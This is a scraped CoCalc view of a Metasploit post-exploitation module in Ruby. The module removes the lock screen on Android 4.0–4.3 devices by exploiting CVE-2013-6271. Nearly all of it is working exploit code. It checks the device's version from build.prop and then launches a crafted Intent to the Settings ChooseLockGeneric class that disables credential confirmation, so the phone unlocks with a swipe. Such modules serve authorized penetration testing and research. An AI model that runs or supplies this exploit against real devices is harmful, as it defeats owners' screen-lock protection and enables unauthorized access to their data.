Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/manage/remove_lock.rb
24756 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  Rank = NormalRanking

8


9
  include Msf::Post::Common

10
  include Msf::Post::Android::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Android Settings Remove Device Locks (4.0-4.3)',

17
        'Description' => %q{

18
          This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.

19
          Any unprivileged app can exploit this vulnerability to remove the lockscreen.

20
          A logic flaw / design error exists in the settings application that allows an Intent from any

21
          application to clear the screen lock. The user may see that the Settings application has crashed,

22
          and the phone can then be unlocked by a swipe.

23
          This vulnerability was patched in Android 4.4.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'CureSec', # discovery

28
          'timwr' # metasploit module

29
        ],

30
        'References' => [

31
          [ 'CVE', '2013-6271' ],

32
          [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],

33
          [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]

34
        ],

35
        'SessionTypes' => [ 'meterpreter', 'shell' ],

36
        'Platform' => 'android',

37
        'DisclosureDate' => '2013-10-11',

38
        'Notes' => {

39
          'Stability' => [CRASH_SERVICE_DOWN],

40
          'SideEffects' => [CONFIG_CHANGES, SCREEN_EFFECTS],

41
          'Reliability' => []

42
        },

43
        'Compat' => {

44
          'Meterpreter' => {

45
            'Commands' => %w[

46
              android_*

47
            ]

48
          }

49
        }

50
      )

51
    )

52
  end

53


54
  def is_version_compat?

55
    build_prop = get_build_prop

56


57
    # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns

58
    # empty.

59
    if build_prop.empty?

60
      fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.')

61
    end

62


63
    android_version = Rex::Version.new(build_prop['ro.build.version.release'])

64
    if android_version <= Rex::Version.new('4.3') && android_version >= Rex::Version.new('4.0')

65
      return true

66
    end

67


68
    false

69
  end

70


71
  def run

72
    unless is_version_compat?

73
      print_error('This module is only compatible with Android versions 4.0 to 4.3')

74
      return

75
    end

76


77
    result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')

78
    if result.nil?

79
      print_good('Intent started, the lock screen should now be a dud.')

80
      print_good('Go ahead and manually swipe or provide any pin/password/pattern to continue.')

81
    else

82
      print_error("The Intent could not be started: #{result}")

83
    end

84
  end

85
end

86


87